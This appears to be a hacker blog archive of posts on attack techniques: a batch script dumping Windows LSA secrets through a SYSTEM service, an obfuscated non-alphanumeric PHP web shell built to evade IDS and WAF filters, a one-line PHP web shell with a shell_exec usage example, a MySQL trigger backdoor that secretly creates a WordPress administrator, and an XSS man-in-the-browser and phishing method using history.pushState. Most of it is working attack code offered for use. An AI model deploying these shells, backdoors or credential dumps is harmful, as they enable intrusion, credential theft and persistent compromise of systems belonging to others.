And here’s something else! A comic by JEFFK (found at 4chan) about computer security. It reflects the real world. Nothing in this comic is fictional. True story.
Computer Security Tips – JEFFK
1 Reply
LSA.bat
The other day I found myself in the situation where I had to access my LSA (Local Security Authority) secrets on my Windows box.
For those of you who doesn’t know what it is; let me quote Microsoft:
“The Local Security Authority (LSA) is a protected subsystem of Windows that maintains information about all aspects of local security on a system, collectively known as the local security policy of the system. In addition to housing policy information, the LSA provides services for translation between names and security identifiers (SIDs).” – Microsoft.
Sadly, I’m also quite a tinfoil-hat when it comes to shady password recovery tools.
So I read up about it, and here you go!
A small PoC which dumps your LSA secrets. Written in Batch!
[divider style="thin"]
@echo off @break off sc create theif binpath= "regedt32 /E C:\lsa.reg HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets" type= own type= interact sc start theif :wait if exist "C:\lsa.reg" ( goto done ) else ( goto wait ) :done sc delete theif more C:\lsa.reg
[divider style="thin"]
…For the few of those who find yourselves in the same situation.
This is what it does:
[list]
- Initializes a new Windows service (in order to export the keys).
- Invokes the service (it will run as SYSTEM. It’s the only way I could figure out in order to obtain the registry hive).
- Waits until the dump file is generated…
- Opens it up in our-all-favorite more.
[/list]
It do of course require administrative privileges.
Simple and useful!
You may download it here.
Enjoy!
HashDoS PoC
I was at the CCC (28C3) congress in Berlin recently.
Where the two researchers Alexander ‘alech’ Klink and Julian ‘zeri’ Wälde disclosed a DoS vulnerability affecting about all programming languages in the way they utilize hashtables.
Funny thing is, most server technologies, PHP, ASP (.NET), Java variants, Pyhon (django) etc, all appear to be vulnerable to different variants of the attack.
It consists of abusing the hashtable datastructure(s) in a way which all forces the keys to generate the same hash (checksum), and by doing so placing all data in the same bucket(s).
Basically, you trigger the hashtable(s) worst case scenario(s).
…That takes CPU…
You may download their presentation here, in order to get a more in-depth explanation about their findings.
My fellow mates ‘sasha’ and ‘swestres’ started generating collisions for various languages and I took part of their research and made this PoC affecting the hashing algorithm DJBX33A used in PHP5.
So here you go folks, no license, play with the PoC as you wish!
(It’s supposed to work with SSL and over Mono!)
Thats it!
Take care & happy new years!
Cheers!
Hidden ASCII (Art)
What have been seen, cannot be unseen.
Anti Alphanum PHP Shell
After my release about the Tiny PHP Shell, Mr. Gareth Hayes @ The Spanner made a non-alphanumeric variant.
I got inspired by his nifty script and started researching further.
My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this:
@$_[]=@!+_;
PHP will try to parse the green underscore as a constant, when the interpreter is unable to find the constant it will prompt you with a notice. I surpress the notice warning using the ‘@‘.
The “lost-constant“ in turn will be converted to a string (string(1) “_”).
Just like Gareth Hayes, I used the plus-operator (red) to cast the string to an integer (int(0)).
By appending the exclamation-mark (blue), the value 0 will be casted to a boolean (bool(true)).
So far so good! We have a boolean saying true!
I try to store it by pushing the value into the array $_ (yellow). However it doesn’t exist.
By suppressing that too, PHP will automagically create it for you, and your value will get stored.
That’s how I initialize my array. So, what do we do know?
Well, just like Mr. Gareth stated, if you try to access an array as a string in PHP.
It will generate the string “Array”.
If we have a string, we can generate other strings out of it by (ab)using AND, OR and XOR.
I figured, I had quite a few characters I easily could generate in PHP.
So I coded this fuzzer in VB.NET which permutated through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now when I’m thinking about it later on, I could have added COOKIE too…)
Never the less, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt.
By analyzing the results, you’ll notice we’re able to generate all of those three methods by using only a 15 character list.
But for the sake of clarity, I choosed to go with GET.
By utilizing some boolean magic and variable dereferencing I ended up with this:
<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth – h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>
…if WordPress tampered with the bytes, you may download it here.
The method for execution used in the Tiny PHP Shell and Gareth’s shell remains the same.
But if you look at it, I added a few sneak factors.
- No quotes! Quotes tend to trigger IDS’es and WAF’s.
- No use of functions.
- No strings.
- No numbers.
- No constants.
If you’re going to the Chaos Communication Congress – 28C3 (2011), then see you there!
Ciao.
Send POST data to an embedded iframe (jQuery/javascript)
Some time ago I was in the need for a way in javascript to send a POST data to a file and load it’s contents in iframe format, the contents were in the form of application/PDF and the PDF would vary from what I would send in my POST values.
Non-challenging as it sounds it still took me some time to figure out – not a problem should be solved twice so here is a little function which does this:
function loadFile(url){
if(typeof(url)=='string'){
file = document.createElement("iframe");
$('body').append(file);
form = document.createElement("form");
$(form).attr({"action":url,"method":"POST"});
$(form).append($(document.createElement('input')).attr({"name":"postKey","value":"postVal"}));
$(file).contents().find('body').append(form);
$(form).submit();
return file;
}else{
return 1;
}
}
This function can be useful in the act of exploitation cross site scripting vulnerabilities or just for productional use.
Blipp Blopp
This is how you feel when you discover obvious vulnerabilities.
‘Nuff said.
Cya soon.
MySQL Backdoor
I shall now present a method which appear to be long forgotten.
I first stumbled upon it back in 2008 when the group VFH (Vuxna Förbannade Hackare) spread havoc upon Swedish agencies and organizations.
Trigger based backdoors in MySQL.
- So what are they?
A trigger in MySQL acts as a callback on which is executed before and/or after an UPDATE/INSERT is finished.
Take this for example: A unicorn have played with a WordPress database.
He inserted a trigger which would interact with a specific table, say wp_comments.
When someone would post a comment, it would get inserted into wp_comments and the trigger would be called. - What can you do with MySQL?
Well. That depends on your permissions (obviously).
But basically tamper with tables. - So what can be done with WordPress?
Say the unicorn made an evil trigger which allowed modification of WordPress administrators whenever a specific comment got posted. Say the unicorn could add new admins (e.g; himself).
If he now happened to add himself. He would get access to WordPress plugin feature, which in turn, would allow him to upload an even more evil plugin. (PHP Shell).
…and here I present a Proof-of-Concept…
My PoC basically consists of a single trigger, with one big IF-statement.
The main logic is triggered whenever a WordPress comment with the name set to Almroot is posted.
The trigger will look through all administrators in wp_users for the any user with the name of Almroot.
If no such user exists, it will be added with full admin privileges - otherwise, it will escalate the privileges to administrative and restore the password.
The IP, UserAgent and other vital elements of the comment will be nullified (The IP will point towards localhost) – and the post will be put in spam.
Once logged on to WordPress, you can simply upload whatever you want.
Just ZIP the files, and upload as a plugin.
You’ll find the files in: /wp-content/plugins/name-of-zip/your_file.whatever
Just ZIP the files, and upload as a plugin.
You’ll find the files in: /wp-content/plugins/name-of-zip/your_file.whatever
Sounds bad doesn’t it?
There is a few drawbacks though.
- The DBMS have to by MySQL.
- The MySQL user on which you’re allowed to tamper with – need to have the Super_priv set to True. (As of MySQL 5.1.6 – the Trigger_priv set to True).
- This trigger cannot be applied through a regular SQL Injection – so don’t try anything fishy!
A more extensive trigger can of course be crafted.
VFH’s PoC was able to read and write files for example.
In combination with raptor_udf.c; commands can be executed as well.
In combination with raptor_udf.c; commands can be executed as well.
In order to determine if you’re infected or not, just take a look in the information_schema.triggers table.
Normally web-based CMS’es wont utilize triggers, so if you find something in there – analyze it.
Normally web-based CMS’es wont utilize triggers, so if you find something in there – analyze it.
Be creative!
Don’t be cheap!
Don’t be cheap!
Reference: vfh-03.txt
Ciao!
The man in the browser and Phishing with legit URL’s
Hi there!
I have always been fascinated by the concept of a victim browsing around on a website not knowing that I can see everything he does, and all this from a simple XSS! After I stumbled upon a relatively new HTML5 function in the window.history object called “pushState”, I just had to make a proof of concept.
What does this function do?
Well, it’s made for manipulating the browser history and it will also let you tamper the URL bar, if you for example load “myajaxsite/asd.php” with AJAX you could show “myajaxsite/#asd” in the URL. This means we can manipulate the URL to whatever we want, since the function doesn’t even force us to make a request to the new URL, it just pushes an item into the history and changes the URL.
How can we exploit this?
There’s two scenarios I have come up with, let’s start with the simple one. How to use this in a Phishing attack.
- An attacker has an XSS on facebook.com/somepath/someotherpath/blabla/uglylongpath?xss=hello
- The attacker injects a script in the victims browser that uses the history.pushState function to spoof the URL to facebook.com/login.php. This will cause the URL bar to display http://facebook.com/login.php, but won’t cause the browser to load login.php or even check that it exists.
- The victim enters the link, it looks like he has to login to see this content. He is a bit suspicious, so he checks the source code for malicious stuff but finds nothing since he is looking at the sourcecode of facebook.com/login.php instead of the attackers URL.
- The victim logs in, and the attacker steals the form data.
Pretty straight-forward scenario, don’t you think?
But that’s boring. Let’s take it to the not-so-straight-forward scenario, the man-in-the-browser.
So, what exactly IS a man-in-the-browser attack? Here’s a short description from OWASP:
The Man-in-the-Browser attack is the same approach as Man-in-the-middle attack, but in this case a Trojan Horse is used to intercept and manipulate calls between the main application’s executable (ex: the browser) and its security mechanisms or libraries on-the-fly.
Basicly, I wrote a PoC on this concept… 
The PoC is pretty straight-forward, it hooks all links and forms and prevents them to link away and instead we load the page with AJAX and spoof the URL with the history.pushState method.
If we “misuse” CORS (Cross-Origin Resource Sharing), we can have the control center and log at some other domain.
Of course, we cannot load resources cross-domain by default, so if we fail to load a resource we will just use the window.open() method instead.
So. What if the victim uses the back button in his browser? For this I found another nifty method, when you go back in your browser history, a window.onpopstate() event is called, so we can load the previous resource instead to show the user.
To sum up, the only way to really “get away” from this evil hook is to enter another URL in the URL bar and navigate away. Of course noscript will prevent these kind of attacks but that is not relevant. Is there any fast way to know you are infected by an attack like this? No, at least not that I know of. Normally you could identify it by malicious looking links, the URL bar not changing or viewing the source but all these things are void with if the attacker uses these methods.
…And for you who wish to test this out, here is the PoC: MITB.zip
In fact, I encourage you to try it out, it’s pretty creepy!
Cheers!
Update: This is now part of the BeEF framework!
Tiny PHP Shell
Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven’t been all too stealth!
This is really pointless, but someone might be interested in it.
So here you go folks!
<?=($_=@$_GET[2]).@$_($_GET[1])?>
It doesn’t look like much so let me explain.
PHP allows strings to be interpreted as function calls.
That’s a major part on how callbacks in PHP work.
Example:
<?
$array = array(1,2,3);
array_walk($array, ‘f’);
function f($x){echo $x * 2;}
?>
What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list.
The function f() prints out the value from the array and multiplies it by two.
The output results in: 246.
The fun thing is, if you look on how the callback f() is applied – it’s by a simple string. (Look at argument #2 in the first function; array_walk()).
What does that mean?
Well, to put it short, you’re able to take a string – and execute it as a function name.
Now, let’s try something… fuzzier…
<?
$fuzz = ‘phpinfo’;
$fuzz();
?>
What might this do?
Will it execute?
Damn right.
Now let’s tear my tiny code apart.
It’s made out of two parts.
- $_=@$_GET[2]
- @$_($_GET[1])
The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it’s one-and-only argument.
The @‘s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.
Conclusion: Copy and paste the snippet, and store it in a PHP-file.
Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami
The response should be something like:
apache
…or as on Windows if you’re running your server as a service:
nt authority/system.
Conclusion; PHP is fun!
Ciao!